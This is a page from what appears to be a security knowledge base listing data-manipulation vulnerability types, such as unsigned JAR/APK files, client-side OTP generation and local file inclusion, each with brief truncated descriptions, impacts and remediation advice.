Criteria | Data Manipulation

Data Manipulation
Insufficient data authenticity validation - JAR signing
Description The JAR files that compose the application are not correctly signed, allowing an attacker to modify the code withouth raising alerts on an integrity check. Impact Inject malicious code in the application without raising alerts. ...
Insecurely generated token - OTP
Description The OTP is generated client-side and sent to the server, so an attacker only needs to intercept the request to access the token and continue the application flow without needing access to the phone number used. Impact Make requests ...
Insufficient data authenticity validation - Device Binding
Description Insecure device pairing results in an insecure communication between two physical devices. Device-pairing protocols configured are vulnerable to the misbinding attacks, it arises from the lack of verifiable identifiers. Impact - Spoof, ...
Insufficient data authenticity validation - Checksum verification
Description The application does not properly validate the integrity of resources loaded from external servers. Impact Use third-party resources without verifying that the integrity has not been compromised. Recommendation Validate the integrity of ...
Insufficient data authenticity validation - Images
Description The system does not validate that profile image URLs lead to a valid image, allowing partial paths or URLs to be placed that can be used to craft more complex attack vectors such as controlled redirects or CSRF. Impact Manipulate the ...
Insufficient data authenticity validation
Description The application does not control on the server if someone have permission to modify certain fields and allows to use invalid data in some fields, for example non-existing names. Impact Inject potentially malicious characters into ...
Local file inclusion
Description The application allows to read or execute files located on the server through relative paths manipulation in the input fields. Impact - Visualize the content of sensitive files stored on the server. - Get sensitive data. - Read system ...
Out-of-bounds read
Description It is possible to make the system read data before or beyond the intended buffer. Impact Get access to the system and get control of the server. Recommendation - Implement good security practices in the software development life cycle. - ...
Insufficient data authenticity validation - APK signing
Description The APK is not digitally signed. Impact Mischief users into installing an APK that is not owned by the original author. Recommendation Digitally sign the APK. Threat Non-authenticated attacker from the Internet. Expected Remediation Time ...
External control of file name or path
Description It is possible to modify the path to which an uploaded file will be saved. Impact - Save files in paths other than those expected by the application. - Overwrite important files within the system by referring to the path where the upload ...

Criteria | Data Manipulation | Knowledge Base

Data Manipulation

Insufficient data authenticity validation - JAR signing

Insecurely generated token - OTP

Insufficient data authenticity validation - Device Binding

Insufficient data authenticity validation - Checksum verification

Insufficient data authenticity validation - Images

Insufficient data authenticity validation

Local file inclusion

Out-of-bounds read

Insufficient data authenticity validation - APK signing

External control of file name or path